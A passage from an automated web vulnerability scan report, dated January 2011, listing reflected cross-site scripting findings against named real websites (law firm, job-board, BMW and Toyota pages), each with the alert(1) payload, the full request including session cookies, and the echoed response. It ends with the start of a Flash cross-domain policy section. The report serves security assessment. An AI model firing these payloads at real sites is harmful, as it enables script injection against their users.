3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 87cde<script>alert(1)</script>82c5bf98272 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:31:09 GMT
Last-Modified: Fri, 21 Jan 2011 18:31:09 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272
//path:
//################################################################

3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757dc"><script>alert(1)</script>3bca8978ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?757dc"><script>alert(1)</script>3bca8978ac9=1 HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=c8n3ncns7ht7t0si0k3dgtk073; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96306

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.veterinarycrossing.com/?757dc"><script>alert(1)</script>3bca8978ac9=1">
...[SNIP]...

3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c91"><script>alert(1)</script>558fd7307bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3c91"><script>alert(1)</script>558fd7307bc=1 HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gsjp47s81aiji0u54k67gabll2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109157

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.volunteercrossing.com/?f3c91"><script>alert(1)</script>558fd7307bc=1">
...[SNIP]...

3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea6"><script>alert(1)</script>4ebf1ff23b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21ea6"><script>alert(1)</script>4ebf1ff23b7=1 HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vppakdfp3q5re522ilii6gj224; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.workathomecrossing.com/?21ea6"><script>alert(1)</script>4ebf1ff23b7=1">
...[SNIP]...

3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0d9"><script>alert(1)</script>4355e2650f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ad0d9"><script>alert(1)</script>4355e2650f=1 HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=slji4fnof2adg25ahsbg5ats32; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113221

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.writingcrossing.com/?ad0d9"><script>alert(1)</script>4355e2650f=1">
...[SNIP]...

3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e193"><script>alert(1)</script>73375c8c0c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /searchresults.php?key=OP3V61427 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=p8tpdlaudtgnv3nbu08cvm6rl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: BCGJOB_61427=61427; expires=Sat, 05-Feb-2011 19:35:18 GMT; domain=bcgsearch.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37779

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Employment Attorney, Employment Lawyer Jobs, San Francisco, California - 61
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7">
...[SNIP]...

3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/jsenvconst.ashx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a9f9"-alert(1)-"b61067d8f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:16 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:47:16 GMT;path=/
Content-Length: 663

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...
R_HANDLING_URL_PART = "/BYO/ErrorReportingService.svc";
var CLIENT_USER_AGENT = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0";
var CONNECTION_TYPE = "http://";

3.147. http://www.employmentauthority.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.employmentauthority.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b213"><script>alert(1)</script>04714215063 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=1coc9qurhv2fasslu1mvim2s27; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...
<input type="hidden" id="clscandidate_refferalurl" name="clscandidate_refferalurl" value="http://www.google.com/search?hl=en&q=5b213"><script>alert(1)</script>04714215063">
...[SNIP]...

3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.lawschoolloans.com
Path:	/lslprivateloan_application.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c53'-alert(1)-'09f566a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:04 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=12661fb1a6201f640fe9b1adbc58f535; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29971

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...
<script type="text/javascript">
   var submitflag = false;

   var page_referrer = 'http://www.google.com/search?hl=en&q=79c53'-alert(1)-'09f566a429';
   var landing_page = 'lslprivateloan_application.php';
   function validateregistration()
   {
       var frm = document.formmain;
       errmsg = "";
       frm.clsregistration_hdnpage_referrer.value = page_referrer
...[SNIP]...

3.149. http://www.legalauthority.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9df7c"><script>alert(1)</script>a596e96ecab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=03bo7h1rnmb5ajcrf3d5hmjr85; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:41 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130329

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=9df7c"><script>alert(1)</script>a596e96ecab">
...[SNIP]...

3.150. http://www.legalauthority.com/signup.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b9a"><script>alert(1)</script>58b9969c6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=gf3uf2l80p21qgdvt5tkeeshn4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=70b9a"><script>alert(1)</script>58b9969c6e">
...[SNIP]...

3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.legalauthority.com
Path:	/tmlandingpage.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5a1a"><script>alert(1)</script>3ecb044851e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /tmlandingpage.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:41:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=ldenka01g7h9afh3an526c4l36; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=a5a1a"><script>alert(1)</script>3ecb044851e">
...[SNIP]...

3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/mobility/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a was submitted in the REST URL parameter 1. This input was echoed as ecf7d"style="x:expression(alert(1))"838c92d8b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /mobilityecf7d"style%3d"x%3aexpression(alert(1))"838c92d8b6a/index.html HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html
Content-Length: 295
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:54:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.toyotamobility.comecf7d"style="x:expression(alert(1))"838c92d8b6a/index.html">
...[SNIP]...

4. Flash cross-domain policy previous next
There are 5 instances of this issue:

http://www.huffingtonpost.com/crossdomain.xml
http://www.msnbc.msn.com/crossdomain.xml
http://www.nytimes.com/crossdomain.xml
http://www.politico.com/crossdomain.xml
http://www.usatoday.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://www.huffingtonpost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "26e2850-fd-48a53d22e2200"
Content-Type: application/xml
Date: Fri, 21 Jan 2011 22:28:28 GMT
Content-Length: 253
Connection: close

